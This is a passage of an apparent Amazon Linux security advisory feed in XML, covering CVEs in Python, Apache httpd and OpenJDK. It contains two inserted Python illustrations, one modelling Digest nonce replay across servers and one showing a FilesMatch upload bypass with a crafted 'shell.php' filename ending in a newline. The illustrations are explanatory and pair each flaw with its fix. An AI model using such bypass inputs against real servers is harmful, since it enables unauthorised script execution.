name="java-1.8.0-openjdk-demo" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.171-7.b10.37.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.171-7.b10.37.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.171-7.b10.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1003</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1003: medium priority package update for python34 python35 python36 python27</title><issued date="2018-04-26 17:28:00" /><updated date="2018-05-03 22:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1061:
A flaw was found in the way catastrophic backtracking was implemented in python&#039;s difflib.IS_LINE_JUNK method. An attacker could use this flaw to cause denial of service.
1549192:
CVE-2018-1061 python: DOS via regular expression backtracking in difflib.IS_LINE_JUNK method in difflib
CVE-2018-1060:
A flaw was found in the way catastrophic backtracking was implemented in python&#039;s pop3lib&#039;s apop() method. An attacker could use this flaw to cause denial of service.
1549191:
CVE-2018-1060 python: DOS via regular expression catastrophic backtracking in apop() method in pop3lib
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1060" title="" id="CVE-2018-1060" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1061" title="" id="CVE-2018-1061" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34-tools" version="3.4.8" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.8-1.39.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.8" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.8-1.39.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.8" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.8-1.39.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.8" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.8-1.39.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.8" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.8-1.39.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.8" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.8-1.39.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.8" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.8-1.39.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.8" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.8-1.39.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.8" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.8-1.39.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.8" release="1.39.amzn1" epoch="0" 
arch="i686"><filename>Packages/python34-debuginfo-3.4.8-1.39.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.8" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.8-1.39.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.8" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.8-1.39.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.5" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.5-1.12.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.5" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.5-1.12.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.5" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.5-1.12.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.5" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.5-1.12.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.5" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.5-1.12.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.5" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.5-1.12.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.5" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.5-1.12.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.5" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.5-1.12.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.5" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.5-1.12.amzn1.i686.rpm</filename></package><package name="python35" 
version="3.5.5" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.5-1.12.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.5" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.5-1.12.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.5" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.5-1.12.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.5-1.9.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.5" release="1.9.amzn1" epoch="0" 
arch="i686"><filename>Packages/python36-debug-3.6.5-1.9.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.5-1.9.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.5-1.9.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.5-1.9.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.5-1.9.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.5-1.9.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.14" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.14-1.123.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.14" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.14-1.123.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.14" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.14-1.123.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.14" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.14-1.123.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.14" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.14-1.123.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.14" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.14-1.123.amzn1.x86_64.rpm</filename></package><package 
name="python27-libs" version="2.7.14" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.14-1.123.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.14" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.14-1.123.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.14" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.14-1.123.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.14" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.14-1.123.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.14" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.14-1.123.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.14" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.14-1.123.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1004</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1004: medium priority package update for httpd24</title><issued date="2018-05-03 16:29:00" /><updated date="2018-05-03 22:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1312:
In Apache httpd 2.2.0 to 2.4.29, when generating an HTTP Digest authentication challenge, the nonce sent to prevent replay attacks was not correctly generated using a pseudo-random seed. In a cluster of servers using a common Digest authentication configuration, HTTP requests could be replayed across servers by an attacker without detection.
1560634:
CVE-2018-1312 httpd: Weak Digest auth nonce generation in mod_auth_digest
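Added illustration of the cross-server replay condition described above; this is not code from the advisory or from mod_auth_digest, but a minimal model of a timestamp-plus-HMAC nonce whose only difference between the two variants is how the per-server secret is seeded. The realm name, the nonce layout, the freshness window and the configuration text are all assumptions made for the demonstration.

```python
import hashlib
import hmac
import secrets

REALM = "example-realm"  # assumed realm name for the demonstration


def make_nonce(server_secret, now):
    """Nonce = timestamp plus an HMAC tag over it under the server's secret (illustrative layout)."""
    stamp = str(int(now)).encode()
    tag = hmac.new(server_secret, stamp + b":" + REALM.encode(), hashlib.sha256).hexdigest()
    return stamp.decode() + ":" + tag


def nonce_is_valid(server_secret, nonce, now, max_age=300):
    """A server accepts a nonce only if the tag verifies under *its own* secret and it is still fresh."""
    stamp, tag = nonce.split(":", 1)
    expected = hmac.new(server_secret, stamp.encode() + b":" + REALM.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return False
    age = int(now) - int(stamp)
    return age in range(max_age + 1)  # 0 to max_age seconds old


def weak_secret(config_text):
    """Flawed seeding (model of the CVE-2018-1312 condition): the secret is a pure function of the
    shared configuration, so every cluster member that shares the config derives the same secret."""
    return hashlib.sha256(config_text.encode()).digest()


def strong_secret(_config_text):
    """Correct seeding: a per-process secret from the OS CSPRNG; the config no longer determines it."""
    return secrets.token_bytes(32)


def cross_server_replay(secret_factory, config_text, now):
    """Issue a nonce on server A and report whether server B, configured identically, accepts it."""
    secret_a = secret_factory(config_text)
    secret_b = secret_factory(config_text)
    nonce_from_a = make_nonce(secret_a, now)
    return nonce_is_valid(secret_b, nonce_from_a, now + 5)
```

With weak_secret, cross_server_replay returns True: a challenge answered on one server is accepted by its siblings, which is the replay the advisory describes. With strong_secret it returns False. The real mod_auth_digest nonce carries more fields than this model, but the seeding property is the one the fix addresses.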
CVE-2018-1303:
A specially crafted HTTP request header could have crashed the Apache HTTP Server prior to version 2.4.30 due to an out-of-bounds read while preparing data to be cached in shared memory. It could be used as a denial-of-service attack against users of mod_cache_socache. The vulnerability is considered low risk since mod_cache_socache is not widely used; mod_cache_disk is not affected by this vulnerability.
1560399:
CVE-2018-1303 httpd: Out of bounds read in mod_cache_socache can allow a remote attacker to cause a denial of service
CVE-2018-1302:
When an HTTP/2 stream was destroyed after being handled, the Apache HTTP Server prior to version 2.4.30 could have written a NULL pointer to memory that may already have been freed. The memory pools maintained by the server make this vulnerability hard to trigger in usual configurations; the reporter and the team could not reproduce it outside debug builds, so it is classified as low risk.
1560625:
CVE-2018-1302 httpd: Use-after-free on HTTP/2 stream shutdown
CVE-2018-1301:
A specially crafted request could have crashed the Apache HTTP Server prior to version 2.4.30, due to an out-of-bounds access after the size limit for reading the HTTP header is reached. This vulnerability is considered very hard if not impossible to trigger in non-debug mode (both log and build level), so it is classified as low risk for common server usage.
1560643:
CVE-2018-1301 httpd: Out of bound access after failure in reading the HTTP request
CVE-2018-1283:
It has been discovered that the mod_session module of Apache HTTP Server (httpd), through version 2.4.29, has an improper input validation flaw in the way it handles HTTP session headers in some configurations. A remote attacker may influence their content by using a &quot;Session&quot; header.
1560395:
CVE-2018-1283 httpd: Improper handling of headers in mod_session can allow a remote user to modify session data for CGI applications
CVE-2017-15715:
In Apache httpd 2.4.0 to 2.4.29, the expression specified in &lt;FilesMatch&gt; could match &#039;$&#039; to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.
1560614:
CVE-2017-15715 httpd: &lt;FilesMatch&gt; bypass with a trailing newline in the file name
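Added illustration of the &lt;FilesMatch&gt; mismatch described above; this is not code from the advisory or from httpd. Python's default &#039;$&#039; has the same behaviour as PCRE's: it matches at the end of the string or just before a final newline, so the model reproduces the gap between an upload gate that inspects the literal trailing characters and a handler mapping written with &#039;$&#039;. The upload gate, the handler patterns and the sample filenames are constructed for the demonstration.

```python
import re

# Constructed sample upload names (not from the advisory). The second one carries the
# trailing newline that CVE-2017-15715 describes.
SAMPLE_NAMES = ["shell.php", "shell.php\n", "notes.txt", "shell.php.txt"]

# Handler mapping in the style of a FilesMatch expression: route *.php to the script engine.
HANDLER_DOLLAR = re.compile(r"\.php$")   # '$' also matches just before a final newline
HANDLER_STRICT = re.compile(r"\.php\Z")  # Python '\Z' (PCRE '\z') matches only at the true end


def upload_filter_allows(name):
    """Assumed external upload gate: it only checks the literal trailing characters of the name."""
    return not name.endswith(".php")


def routed_to_script_engine(name, pattern):
    """Does the handler mapping treat this name as a script?"""
    return pattern.search(name) is not None


def bypasses(names, pattern):
    """Names the upload gate lets through but the handler mapping would still execute."""
    return [n for n in names if upload_filter_allows(n) and routed_to_script_engine(n, pattern)]
```

With HANDLER_DOLLAR the bypass list contains "shell.php\n": the gate sees a name ending in a newline and lets it through, while the &#039;$&#039;-anchored mapping still hands it to the script engine. With HANDLER_STRICT the list is empty, because the strict end anchor and the gate agree on where the name ends.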
CVE-2017-15710:
In Apache httpd 2.0.23 to 2.0.65, 2.2.0 to 2.2.34, and 2.4.0 to 2.4.29, mod_authnz_ldap, if configured with AuthLDAPCharsetConfig, uses the Accept-Language header value to look up the right charset encoding when verifying the user&#039;s credentials. If the header value is not present in the charset conversion table, a fallback mechanism is used to truncate it to a two-character value to allow a quick retry (for example, &#039;en-US&#039; is truncated to &#039;en&#039;). A header value of fewer than two characters forces an out-of-bounds write of one NUL byte to a memory location that is not part of the string. In the worst case, quite unlikely, the process would crash, which could be used as a denial-of-service attack. In the more likely case, this memory is already reserved for future use and the issue has no effect at all.
1560599:
CVE-2017-15710 httpd: Out of bound write in mod_authnz_ldap when using too small Accept-Language values
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15710" title="" id="CVE-2017-15710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15715" title="" id="CVE-2017-15715" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1283" title="" id="CVE-2018-1283" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1301" title="" id="CVE-2018-1301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1302" title="" id="CVE-2018-1302" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1303" title="" id="CVE-2018-1303" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1312" title="" id="CVE-2018-1312" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-manual" version="2.4.33" release="2.78.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.33-2.78.amzn1.noarch.rpm</filename></package><package name="httpd24-devel" version="2.4.33" release="2.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.33-2.78.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.33" release="2.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.33-2.78.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.33" release="2.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.33-2.78.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.33" release="2.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.33-2.78.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.33" release="2.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.33-2.78.amzn1.x86_64.rpm</filename></package><package 
name="mod24_proxy_html" version="2.4.33" release="2.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.33-2.78.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.33" release="2.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.33-2.78.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.33" release="2.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.33-2.78.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.33" release="2.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.33-2.78.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.33" release="2.78.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.33-2.78.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.33" release="2.78.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.33-2.78.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.33" release="2.78.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.33-2.78.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.33" release="2.78.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.33-2.78.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.33" release="2.78.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.33-2.78.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.33" release="2.78.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.33-2.78.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.33" release="2.78.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.33-2.78.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.33" release="2.78.amzn1" epoch="1" 
arch="i686"><filename>Packages/mod24_proxy_html-2.4.33-2.78.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.33" release="2.78.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.33-2.78.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1007</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1007: critical priority package update for java-1.7.0-openjdk</title><issued date="2018-05-10 16:50:00" /><updated date="2018-05-10 23:28:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2815:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567537:
CVE-2018-2815 OpenJDK: unbounded memory allocation during deserialization in StubIORImpl (Serialization, 8192757)
CVE-2018-2814:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1567121:
CVE-2018-2814 OpenJDK: incorrect handling of Reference clones can lead to sandbox bypass (Hotspot, 8192025)
CVE-2018-2800:
Vulnerability in the Java SE, JRockit component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 6u181, 7u171 and 8u162; JRockit: R28.3.17. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, JRockit. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, JRockit accessible data as well as unauthorized read access to a subset of Java SE, JRockit accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.0 Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N).
1568163:
CVE-2018-2800 OpenJDK: RMI HTTP transport enabled by default (RMI, 8193833)
CVE-2018-2799:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JAXP). Supported versions that are affected are Java SE: 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567542:
CVE-2018-2799 OpenJDK: unbounded memory allocation during deserialization in NamedNodeMapImpl (JAXP, 8189993)
CVE-2018-2798:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: AWT). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567543:
CVE-2018-2798 OpenJDK: unbounded memory allocation during deserialization in Container (AWT, 8189989)
CVE-2018-2797:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JMX). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567545:
CVE-2018-2797 OpenJDK: unbounded memory allocation during deserialization in TabularDataSupport (JMX, 8189985)
CVE-2018-2796:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Concurrency). Supported versions that are affected are Java SE: 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567546:
CVE-2018-2796 OpenJDK: unbounded memory allocation during deserialization in PriorityBlockingQueue (Concurrency, 8189981)
CVE-2018-2795:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567351:
CVE-2018-2795 OpenJDK: insufficient consistency checks in deserialization of multiple classes (Security, 8189977)
CVE-2018-2794:
Vulnerability in the Java SE, JRockit component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162, 10 and JRockit: R28.3.17. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Java SE, JRockit executes to compromise Java SE, JRockit. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, JRockit, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 7.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1567126:
CVE-2018-2794 OpenJDK: unrestricted deserialization of data from JCEKS key stores (Security, 8189997)
CVE-2018-2790:
